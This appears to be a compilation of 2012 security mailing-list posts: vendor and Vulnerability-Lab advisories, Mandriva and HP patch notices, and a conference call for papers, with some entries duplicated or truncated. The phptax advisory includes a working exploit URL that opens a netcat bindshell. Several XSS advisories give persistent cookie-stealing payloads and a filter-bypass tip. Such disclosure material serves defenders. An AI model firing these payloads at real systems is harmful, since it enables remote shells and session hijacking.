phptax 0.8 <= Remote Code Execution Vulnerability
-
phptax 0.8 <= Remote Code Execution Vulnerability
-
Discovered by: Jean Pascal Pereira
Vendor information:
"PhpTax is free software to do your U.S. income taxes. Tested under Unix
environment.
The program generates .pdfs that can be printed and sent to the IRS. See
homepage for details and screenshot."
Vendor URI: http://sourceforge.net/projects/phptax/
Risk-level: High
The application is prone to a remote code execution vulnerability.
drawimage.php, line 63:
include ("./files/$_GET[pfilez]");
// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
Exploit / Proof of Concept:
Bindshell on port 23235 using netcat:
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
Solution:
Do some input validation.
Reminder: ClubHack2012 Call for Papers Closing Soon
Hello Everyone, This is a gentle reminder that the Call for Papers for ClubHack2012 in Pune, India closes on 15th Oct, 2012. Send in you submission as soon as possible. Call For Participation == See http://clubhack.com/2012 for details In 2012, as ClubHack is focusing toward innovation & leadership, we invite papers from enthusiast & seasoned professionals for ClubHack2012 with emphasis on entrepreneurship in infosec and security innovation. These presentations are expected to be of 40 minutes each. The schedule time for each presenter would be 50 minutes out of which 40 minutes are for the presentation & 10 for the question-answer sessions. We would request you to submit the papers keeping the time constraint in mind. :::Topics::: Innovation knows no boundaries. Just to spark your thought process, here?s a hint of topics which you may refer * Entrepreneurship in infosec product development * Research work in infosec * Innovation in attack vectors * Attacks on Cloud * Mobile computing * Malware & Botnets * Privacy with social networks * Telecom Security (3G/4G, SS7, GSM/CDMA, VoIP) and Phone Phreaking * Hardware, Embedded Systems and other Electronic Devices Hacking * War of handhelds & BYOD * Cyber warfare & your role * Open Source Intelligence (OSINT) * Signal Intelligence (SIGINT) : COMINT, ELINT, etc * Critical Infrastructure Protection * Security aspects in SCADA and industrial environments and obscure networks * & the general other infosec domains like web, network, tools & exploits etc. If you want to deliver a workshop at ClubHack2012, please write to us separately and we will help in the same. :::Submission Deadline::: October 15, 2012 :::How to Submit::: Please send us your entries to c...@clubhack.com For more information regarding CFP please visit http://clubhack.com/2012/cfp/ For conference related information please visit the conference web site - http://clubhack.com/2012 OR contact us via email - i...@clubhack.com Hope to see your contribution and support for ClubHack2012. -- Abhijeet Patil ClubHack http://clubhack.com
Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities
Title: == Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities Date: = 2012-09-10 References: === http://www.vulnerability-lab.com/get_content.php?id=700 VL-ID: = 700 Common Vulnerability Scoring System: 4.1 Introduction: = Switchvox is based on the open source IP PBX, Asterisk, and the Linux operating system. It provides an easy to deploy solution for businesses looking for the power of an enterprise PBX with high reliability, excellent support, and low cost. The simple point-and-click online interface allows virtually anyone to set up and manage the system, and because it comes as a pre-configured turnkey package, the server and phones are all plug and play. Switchvox now offers a free edition. This edition is limited to 15 Extensions (Requires Free registration) and does not support the digital Digium cards, other than that it is similar to the SOHO version. Switchvox supports unlimited extensions and has all the basic features that you d expect from a PBX, like voicemail, custom music on hold, time based behaviors, conferencing, call parking, intercom and paging. It also includes features that are typically associated with expensive enterprise systems, such as ACD queues, find me/follow me functionality, unlimited powerful IVR menus that can interact with your company s databases (Press one for sales or please enter your account number followed by the pound key...), MS Outlook integration, and advanced call reporting. Starting at $995, Switchvox is suitable for businesses of one person to hundreds looking to elevate their communication, improve productivity, and save money on long distance charges. Switchvox supports VoIP, regular phone lines, and voice T1 connections, so that your business can configure the system to best handle your typical calling behavior. (Copy of the Vendor Homepage: http://www.switchvox.com/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the Switchvox Appliance with Asterisk v5.1.2. Report-Timeline: 2011-09-10: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the Switchvox Appliance with Asterisk v5.1.2. The bugs allow remote attackers to implement/inject malicious script code on the application side. The vulnerabilities are located in setup and tools modules of the admin panel. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable context manipulation. Exploitation requires low user inter action & low or medium privileged user web application account. Vulnerable Module(s): [+] Tools -> Sound Manager -> Create sound [+] Tools -> SugarCRM switchboard Panel -> setup [+] Setup -> Groups -> Create Extension Group [+] Setup -> Outgoing calls -> Create Outgoing Call rule [+] Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [+] Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call Vulnerable Parameter(s): [+] [Description] [+] [SugarCRM Web URL] [SugarCRM SOAP URL] [+] [Note] Proof of Concept: = The persistent vulnerabilities can be exploited by local low privileged user account with low or medium required user inter action. For demonstration or reproduce ... Review: Tools -> Sound Manager -> Create sound [Description] PoC: http://www.vulnerability-lab.com"; onload=alert(document.cookie)> Review: Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL] --> to see the poc press on test CRM Settings PoC: http://www.vulnerability-lab.com"; onload=alert(document.cookie)> Review: Setup -> Groups -> Create Extension Group [Note] PoC: http://www.vulnerability-lab.com"; onload=alert(document.cookie)> Review: Setup -> Outgoing calls -> Create Outgoing Call rule [Note] PoC: http://www.vulnerability-lab.com"; onload=alert(document.cookie)> Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [Note] PoC:http://www.vulnerability-lab.com"; onload=alert(document.cookie)> Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call [Note] PoC: http://www.vulnerability-lab.com"; onload=alert(document.cookie)> 1- Tools -> Sound Manager -> Create sound [Description] 2- Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL] --> to see the poc press on test CRM Settings 3- Setup -> Groups -> Create E
CA20121001-01: Security Notice for CA License
CA20121001-01: Security Notice for CA License Issued: October 01, 2012 CA Technologies Support is alerting customers to two potential risks in CA License (also known as CA Licensing). Vulnerabilities exist that can allow a local attacker to execute arbitrary commands or gain elevated access. CA Technologies has issued patches to address the vulnerabilities. The first vulnerability, CVE-2012-0691, occurs due to insecure use of system commands. An unprivileged user can exploit this vulnerability to execute commands with system or administrator privileges. The second vulnerability, CVE-2012-0692, occurs due to inadequate user validation. An unprivileged user can exploit this vulnerability to create or modify arbitrary files and gain elevated access. Risk Rating High Affected Platforms AIX 5.x DEC HP-UX Linux Mac OS X Solaris Windows Affected Products CA Aion Business Rules Expert r11.0 CA ARCserve Backup r12.5, r15, r16 CA ARCserve Central Protection Manager r16 CA ARCserve Central Reporting r16 CA ARCserve D2D r15, r16, r16 On Demand CA ARCserve Central Host Based VM Backup (formerly CA ARCserve Host Based VM Backup) r16 CA ARCserve Central Virtual Standby (formerly CA ARCserve Virtual Conversion Manager) r16 CA Automation Point r11.2, r11.3 CA Client Automation (formerly CA Desktop and Server Management) r12.0, r12.0 SP1, r12.5 CA Common Services (CCS) r11.2 SP2 CA ControlMinder (formerly CA Access Control) 12.5, 12.6 CA ControlMinder for Virtual Environments (formerly CA Access Control for Virtual Environments) 2.0 CA Database Management r11.3, r11.4, r11.5 CA Directory 8.1 CA Easytrieve for Windows and UNIX 11.0, 11.1 CA Easytrieve for Linux PC 11.6 CA Erwin Data Modeler r7.x CA Fast Unload for Distributed Databases 11.3, 11.4, 11.5 CA Gen r8 CA IdentityMinder (formerly CA Identity Manager) r12 CR16 and earlier CA Insight Database Performance Manager 11.3, 11.4, 11.5 CA IT Asset Manager (ITAM) r12.6 and earlier CA IT Client Manager r12.0, r12.0 SP1, r12.5 CA IT Inventory Manager r12.0, r12.0 SP1, r12.5 CA NSM r11.0, r11.1, r11.2, r11.2 SP1, r11.2 SP2 CA Output Management Web Viewer 11.5 CA Plex r6, r6.1 CA Repository for Distributed Systems r2.3 CA Service Accounting r12.5, r12.6 CA Service Catalog r12.5, r12.6 CA Service Desk Manager r12.1, r12.5, r12.6 CA Single Sign-On (SSO) r8.1, r12.0, r12.1 CR4 and earlier CA Software Change Manager 12.0 FP2, 12.1, 12.1 SP1, 12.1 SP2, 12.1 SP3 CA Software Compliance Manager r12.0, r12.6 CA Storage Resource Manager (SRM) 11.8, 12.6 CA TSreorg for Distributed Databases 11.3, 11.4, 11.5 CA Unicenter Asset Portfolio Management r11.3, r11.3.4, r12.6 CA Workload Automation AE 4.5.0, 4.5.1, r11, r11.3 CA Workload Automation DE r11.3 CA XCOM Data Transport Gateway PC Linux r11.5 CA XCOM Data Transport Gateway Windows r11.5 CA XCOM Data Transport for PC Linux r11.5 CA XCOM Data Transport for Windows r11.5 CA XCOM Data Transport Management Center for PC Linux r11.5 CA XCOM Data Transport Management Center for Windows r11.5 Affected Components CA License 1.90.02 and earlier Non-Affected Products CA ControlMinder (formerly CA Access Control) 12.6 SP1 CA Client Automation 12.5 SP1 CA Directory r12.0 SP1 or later CA Gen r8.5 CA IdentityMinder (formerly CA Identity Manager) r12.5 CA IT Client Manager r12.5.SP1 CA IT Inventory Manager r12.5.SP1 CA Plex r7.0 CA Service Accounting r12.7 CA Service Catalog r12.7 CA Service Desk Manager r12.7 CA Single Sign-On (SSO) r12.1 CR5 CA Storage Resource Manager (SRM) 12.6 SP1 CA Workload Automation DE r11.1 (does not use CA License) Non-Affected Components CA License 1.90.03 or later How to determine if the installation is affected All versions of CA License before 1.90.03 are vulnerable. The installed version of CA License can be obtained by using the “lic98version” program. Lic98version retrieves the version of CA License installed on a machine along with the version of specific individual files. The version information is written to the lic98version.log file located in the CA License installation location, and is also displayed on the console. Solution CA has issued patches to address the vulnerability. For all CA product installations on Linux, please note these Linux-specific instructions: 1. First, make backups of the ca.olf file and the lic98.dat file. 2. Uninstall the existing/old version of CA License. 3. Perform the installation of CA License 1.90.04. 4. Confirm the successful installation of 1.9.04, and then replace the existing ca.olf file and lic98.dat file with the files you backed up in step 1. If additional information is required, please contact CA Technologies Support at https://support.ca.com/ CA Aion Business Rules Expert r11.0: Download and install CA License v1.90.04 or later for Windows and Linux platforms, or v1.90.03 or later for all other platforms: https://support.ca.com/irj/portal/anonymous/phpsup
Better WP Security v3.4.3 Wordpress - Web Vulnerabilities
Title: == Better WP Security v3.4.3 Wordpress - Web Vulnerabilities Date: = 2012-08-20 References: === http://www.vulnerability-lab.com/get_content.php?id=691 VL-ID: = 691 Common Vulnerability Scoring System: 3.5 Introduction: = plugin thereby ensuring that as many security holes as possible are patched without having to worry about conflicting features or the possibility of missing anything on your site. With one-click activation for most features as well as advanced features for experienced users Better WP Security can help protect any site. (Copy of the Vendor Homepage: http://wordpress.org/extend/plugins/better-wp-security/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the Better WP security v3.4.3 Wordpress Application Addon. Report-Timeline: 2012-08-21: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the Better WP security v3.4.3 Wordpress Application Addon. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action. The bugs are located on server side in the Limit Login Attempts, Exception Handling Error & Intrusion Detection module with the bound vulnerable email address & error parameter. Successful exploitation can result in wordpress application account steal, client side phishing & client-side content request manipulation. Exploitation requires medium or high user inter action & without privileged web application user account. Vulnerable Module(s): [+] Better WP Security - Limit Login Attempts & Intrusion Detection [+] Exception Handling Error Vulnerable Parameter(s): [+] Email Address [+] Error Proof of Concept: = The persistent vulnerability can be exploited by remote attackers with low required user inter action & low privileged application user account. For demonstration or reproduce ... Inject the following example string to the application input (persistent) or parameter (client side) String: >"http://www.vulnerability-lab.com> Review: Listings Email Address <[PERSISTENT INJECTED SCRIPT CODE!]")' <="" ad...@vulnerability-lab.com"=""> Review: Exception Handling Attention ! Please add this site now to your http://managewp.com/wp-admin";>ManageWP.com account. Or deactivate the Worker plugin to avoid http://managewp.com/user-guide/security";>security issues. Login time period needs to be aan integer greater than 0. \"><[PERSISTENT INJECTED SCRIPT CODE!]")' <="" is="" not="" a="" valid="" ip.<="" p=""> Solution: = The vulnerabilities can be patched by parsing the email address & error exception handling parameters and output listing. Risk: = The security risk of the persistent input validation vulnerabilities are estimated as medium. Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Labora
Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities
Title: == Switchvox Asterisk v5.1.2 - Multiple Web Vulnerabilities Date: = 2012-09-10 References: === http://www.vulnerability-lab.com/get_content.php?id=700 VL-ID: = 700 Common Vulnerability Scoring System: 4.1 Introduction: = Switchvox is based on the open source IP PBX, Asterisk, and the Linux operating system. It provides an easy to deploy solution for businesses looking for the power of an enterprise PBX with high reliability, excellent support, and low cost. The simple point-and-click online interface allows virtually anyone to set up and manage the system, and because it comes as a pre-configured turnkey package, the server and phones are all plug and play. Switchvox now offers a free edition. This edition is limited to 15 Extensions (Requires Free registration) and does not support the digital Digium cards, other than that it is similar to the SOHO version. Switchvox supports unlimited extensions and has all the basic features that you d expect from a PBX, like voicemail, custom music on hold, time based behaviors, conferencing, call parking, intercom and paging. It also includes features that are typically associated with expensive enterprise systems, such as ACD queues, find me/follow me functionality, unlimited powerful IVR menus that can interact with your company s databases (Press one for sales or please enter your account number followed by the pound key...), MS Outlook integration, and advanced call reporting. Starting at $995, Switchvox is suitable for businesses of one person to hundreds looking to elevate their communication, improve productivity, and save money on long distance charges. Switchvox supports VoIP, regular phone lines, and voice T1 connections, so that your business can configure the system to best handle your typical calling behavior. (Copy of the Vendor Homepage: http://www.switchvox.com/ ) Abstract: = The Vulnerability Laboratory Research Team discovered multiple persistent web vulnerabilities in the Switchvox Appliance with Asterisk v5.1.2. Report-Timeline: 2011-09-10: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple persistent input validation vulnerabilities are detected in the Switchvox Appliance with Asterisk v5.1.2. The bugs allow remote attackers to implement/inject malicious script code on the application side. The vulnerabilities are located in setup and tools modules of the admin panel. Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable context manipulation. Exploitation requires low user inter action & low or medium privileged user web application account. Vulnerable Module(s): [+] Tools -> Sound Manager -> Create sound [+] Tools -> SugarCRM switchboard Panel -> setup [+] Setup -> Groups -> Create Extension Group [+] Setup -> Outgoing calls -> Create Outgoing Call rule [+] Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [+] Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call Vulnerable Parameter(s): [+] [Description] [+] [SugarCRM Web URL] [SugarCRM SOAP URL] [+] [Note] Proof of Concept: = The persistent vulnerabilities can be exploited by local low privileged user account with low or medium required user inter action. For demonstration or reproduce ... Review: Tools -> Sound Manager -> Create sound [Description] PoC: http://www.vulnerability-lab.com"; onload=alert(document.cookie)> Review: Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL] --> to see the poc press on test CRM Settings PoC: http://www.vulnerability-lab.com"; onload=alert(document.cookie)> Review: Setup -> Groups -> Create Extension Group [Note] PoC: http://www.vulnerability-lab.com"; onload=alert(document.cookie)> Review: Setup -> Outgoing calls -> Create Outgoing Call rule [Note] PoC: http://www.vulnerability-lab.com"; onload=alert(document.cookie)> Review: Setup -> Incoming Calls -> Caller DID routes -> Create Single DID Route [Note] PoC:http://www.vulnerability-lab.com"; onload=alert(document.cookie)> Review: Setup -> Incoming Calls -> Caller ID Rules -> Create Call transfer Call [Note] PoC: http://www.vulnerability-lab.com"; onload=alert(document.cookie)> 1- Tools -> Sound Manager -> Create sound [Description] 2- Tools -> SugarCRM switchboard Panel -> setup [SugarCRM Web URL] [SugarCRM SOAP URL] --> to see the poc press on test CRM Settings 3- Setup -> Groups -> Create E
GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities
Title:
==
GTA UTM Firewall GB 6.0.3 - Multiple Web Vulnerabilities
Date:
=
2012-09-10
References:
===
http://www.vulnerability-lab.com/get_content.php?id=579
VL-ID:
=
579
Common Vulnerability Scoring System:
4
Introduction:
=
The GTA family of Internet security firewall UTM systems has been expanded to
include three new gigabit appliances.
The GB-2500 Firewall UTM Appliance is one of GTA s most capable firewalls,
designed for businesses with extensive
network demands. Featuring a powerful Intel Dual-Core processor, two gigabits
of RAM and four gigabits of static
memory, the GB-2500 easily handles intensive, resource-demanding network
configurations. The GB-2100 Firewall UTM
Appliance provides robust protection and network reliability for SME
organizations. Featuring flexible configuration
options, straightforward implementation and uncomplicated maintenance and
monitoring, the GB-2100 presents
comprehensive protection that is adaptable to any network environment. The
GB-820 Firewall UTM Appliance is designed
for smaller offices, providing gigabit performance with all the features and
tools available in larger appliances,
but in a space-saving desktop unit. Built-in VPN acceleration provides the
GB-820 with increased throughput, allowing
organizations to easily handle periods of increased VPN activity.
All GTA Firewall UTM Appliances include our advanced firewall features - policy
based NAT, virtual hosting via IP
Aliasing, advanced routing such as BGP and Single-Sign on authentication - at
no extra charge. Threat management
features include DoS and an Intrusion Prevention System (IPS), basic content
filtering and advanced email gateway features.
(Copy of the Vendor Homepage: http://www.gta.com )
Abstract:
=
The Vulnerability Laboratory Research Team discovered multiple web
Vulnerabilities in the GTA UTM Firewall Firmware GB 6.0.3.
Report-Timeline:
2012-05-20: Researcher Notification & Coordination
2012-05-21: Vendor Notification
2012-09-10: Public or Non-Public Disclosure
Status:
Published
Affected Products:
==
Global Technology Assiciates Inc
Product: UTM Firewall Appliance Application vGB 6.0.3
Exploitation-Technique:
===
Remote
Severity:
=
Medium
Details:
Multiple persistent input validation vulnerabilities are detected in the GTA
UTM Firewall Appliance Application Firmware GB 6.0.3.
The bugs allow remote attackers to implement/inject malicious script code on
the application side (persistent).
The first vulnerability is located in the user remote password and pre-shared
secret input fields & user account output listing.
The secound vulnerability is located in the VPN Certificate emailAddress &
subject with affect on the VPN Details Listing section.
Successful exploitation of the vulnerability can lead to session hijacking
(manager/admin), persistent phishing & stable (persistent)
web context manipulation in vulnerable modules or bound application sections.
Exploitation requires low or medium user inter action &
a low or medium privileged web application user/manager account.
Vulnerable Module(s):
[+] Users - [Configure -> Accounts -> Users] -
> Remote Access > L2TP / PPTP > Remote Password
[+] Users - [Configure -> Accounts -> Users] -
> Mobile IPSEC > Modify & ASCII > Pre-shared Secret
[+] VPN Certificate - Input & Listing
Video(s):
[+]
http://www.vulnerability-lab.com/get_content.php?id=629
Proof of Concept:
=
The persistent input validation vulnerabilities can be exploited by remote
attackers with privileged user account & low
required user inter action. For demonstration or reproduce ...
Note:
To bypass the invalid argument filter exception use an onload iframe to request
your external content with cookies. Standard frames
and script tags with double quotes will be blocked by the invalid argument
exception & validation. To verify the bypass use also the
wrong standard strings for the invalid argument validation.
Locations: remotePW_hidden, identity, form input desc,
fullName, Pre-shared Secret, & emailAddress
Good Example Bypass String: ">http://www.vuln-lab.com
onload=alert("GTA") < or ">http://www.vuln-lab.com
onload=alert(document.cookie) <
Wrong Example Bypass String:>"http://google.com> or
alert("TEST")
Review: Users - [Configure -> Accounts -> Users] - > Remote Access > L2TP /
PPTP - Password
... & fullName
... & desc
... or the secret_hidden
<[PERSISTENT SCRIPT CODE!])'
<"=""><
URL:http://gta.127.0.0.1/config/accounts/user/user-fs_en_6.0.3
Review: VPN Certificate - Details Listing
Subject:
emailAddress = "\"><[PERSISTENT SCRIPT CODE
[ MDVSA-2012:155-1 ] xinetd
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:155-1 http://www.mandriva.com/security/ ___ Package : xinetd Date: October 2, 2012 Affected: 2011. ___ Problem Description: A security issue was identified and fixed in xinetd: builtins.c in Xinetd before 2.3.15 does not check the service type when the tcpmux-server service is enabled, which exposes all enabled services and allows remote attackers to bypass intended access restrictions via a request to tcpmux port 1 (CVE-2012-0862). The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0862 ___ Updated Packages: Mandriva Linux 2011: ae9737040630c36506de75263084f974 2011/i586/xinetd-2.3.14-13.1-mdv2011.0.i586.rpm 003bb43ec0db849ead63f244416e37f1 2011/i586/xinetd-simple-services-2.3.14-13.1-mdv2011.0.i586.rpm b5135fe1b3920a072cfef64fd75bb23e 2011/SRPMS/xinetd-2.3.14-13.1.src.rpm Mandriva Linux 2011/X86_64: e8989614f21fea3408d240db31545ba3 2011/x86_64/xinetd-2.3.14-13.1-mdv2011.0.x86_64.rpm cee089878f49c818ddc456797d79b335 2011/x86_64/xinetd-simple-services-2.3.14-13.1-mdv2011.0.x86_64.rpm b5135fe1b3920a072cfef64fd75bb23e 2011/SRPMS/xinetd-2.3.14-13.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQasj/mqjQ0CJFipgRAvfhAJ9jET5mIV1wFrfFJLUOhr4GWeQkNACfU51E 2D5XXPcnqPXoQR/jkHZzifA= =/A7l -END PGP SIGNATURE-
[ MDVSA-2012:156 ] inn
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:156 http://www.mandriva.com/security/ ___ Package : inn Date: October 2, 2012 Affected: 2011. ___ Problem Description: A security issue was identified and fixed in ISC INN: The STARTTLS implementation in INN's NNTP server for readers, nnrpd, before 2.5.3 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted sessions by sending a cleartext command that is processed after TLS is in place, related to a plaintext command injection attack, a similar issue to CVE-2011-0411 (CVE-2012-3523). The updated packages have been upgraded to inn 2.5.3 which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3523 https://www.isc.org/software/inn/2.5.3article ___ Updated Packages: Mandriva Linux 2011: 0fdfb8541c9dde983ada87a196ecc45a 2011/i586/inews-2.5.3-0.1-mdv2011.0.i586.rpm 60e226fec04eaa464dbe7a5f2c593713 2011/i586/inn-2.5.3-0.1-mdv2011.0.i586.rpm 47326ed2fb59ccdbaa5e6328e09deb95 2011/i586/inn-devel-2.5.3-0.1-mdv2011.0.i586.rpm e42adcff2587362f39488faf96f9c496 2011/SRPMS/inn-2.5.3-0.1.src.rpm Mandriva Linux 2011/X86_64: f4824198caa2bbc317a14fd592bff6f7 2011/x86_64/inews-2.5.3-0.1-mdv2011.0.x86_64.rpm 7ac20f123163d73f1dc78757a6c1ed88 2011/x86_64/inn-2.5.3-0.1-mdv2011.0.x86_64.rpm eb416372f4e3cebd236a53c89c83eec5 2011/x86_64/inn-devel-2.5.3-0.1-mdv2011.0.x86_64.rpm e42adcff2587362f39488faf96f9c496 2011/SRPMS/inn-2.5.3-0.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQarmImqjQ0CJFipgRAg6IAKDmIgEoq7aEzwTd7EkcUIoenjxywACfSozW acETQYOqxMaOxt6dNMShDpc= =d6j2 -END PGP SIGNATURE-
[ MDVSA-2012:152-1 ] bind
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:152-1 http://www.mandriva.com/security/ ___ Package : bind Date: October 2, 2012 Affected: 2011. ___ Problem Description: A vulnerability was discovered and corrected in bind: A nameserver can be caused to exit with a REQUIRE exception if it can be induced to load a specially crafted resource record (CVE-2012-4244). The updated packages have been upgraded to bind 9.7.6-P3 which is not vulnerable to this issue. Update: Packages for Mandriva Linux 2011 is being provided. The updated packages have been upgraded to bind 9.8.3-P3 which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4244 https://kb.isc.org/article/AA-00778 ftp://ftp.isc.org/isc/bind9/9.7.6-P3/CHANGES ftp://ftp.isc.org/isc/bind9/9.8.3-P3/CHANGES ___ Updated Packages: Mandriva Linux 2011: ecc7600f8582ac93fe5ebed4ac658c9b 2011/i586/bind-9.8.3-0.0.P3.0.1-mdv2011.0.i586.rpm 43469a462ceae0a03e7e0474175eaa94 2011/i586/bind-devel-9.8.3-0.0.P3.0.1-mdv2011.0.i586.rpm 548ec34953809e9f3a7a2336fe3d62c1 2011/i586/bind-doc-9.8.3-0.0.P3.0.1-mdv2011.0.i586.rpm cb2dbf102709021d48c60403f7535c9a 2011/i586/bind-utils-9.8.3-0.0.P3.0.1-mdv2011.0.i586.rpm 687409d845cc1b964931e6a1f7494b6d 2011/SRPMS/bind-9.8.3-0.0.P3.0.1.src.rpm Mandriva Linux 2011/X86_64: dc178f953c803c2cb478d3b9149bdc61 2011/x86_64/bind-9.8.3-0.0.P3.0.1-mdv2011.0.x86_64.rpm 23ef816f7fffdc53b0465cf0316ccd68 2011/x86_64/bind-devel-9.8.3-0.0.P3.0.1-mdv2011.0.x86_64.rpm 0a555b8851f7a801c49bdcd0c425258a 2011/x86_64/bind-doc-9.8.3-0.0.P3.0.1-mdv2011.0.x86_64.rpm 19a19f9efd7e98e71b6463a8d12e8cfa 2011/x86_64/bind-utils-9.8.3-0.0.P3.0.1-mdv2011.0.x86_64.rpm 687409d845cc1b964931e6a1f7494b6d 2011/SRPMS/bind-9.8.3-0.0.P3.0.1.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.11 (GNU/Linux) iD8DBQFQardomqjQ0CJFipgRApaBAKCKI7/uLjW1Jg5bWosgkiAR/Gzs7gCg2BF0 b0InYk0U+epOWE2Lmf5gKkw= =SSd/ -END PGP SIGNATURE-
[security bulletin] HPSBUX02814 SSRT100930 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 UPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03498127 Version: 1 HPSBUX02814 SSRT100930 rev.1 - HP-UX Running OpenSSL, Remote Denial of Service (DoS) NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2012-09-26 Last Updated: 2012-09-26 Potential Security Impact: Remote Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX OpenSSL. This vulnerability could be exploited remotely to create a Denial of Service (DoS). References: CVE-2012-2333 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL before vA.00.09.08x. BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2012-2333(AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided upgrades to resolve this vulnerability. The upgrades are available from the following location https://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber =OPENSSL11I HP-UX Release Depot Name B.11.11 PA (32 and 64) OpenSSL_A.00.09.08x.001_HP-UX_B.11.11_32_64.depot B.11.23 (PA and IA) OpenSSL_A.00.09.08x.002_HP-UX_B.11.23_IA_PA.depot B.11.31 (PA and IA) OpenSSL_A.00.09.08x.003_HP-UX_B.11.31_IA_PA.depot MANUAL 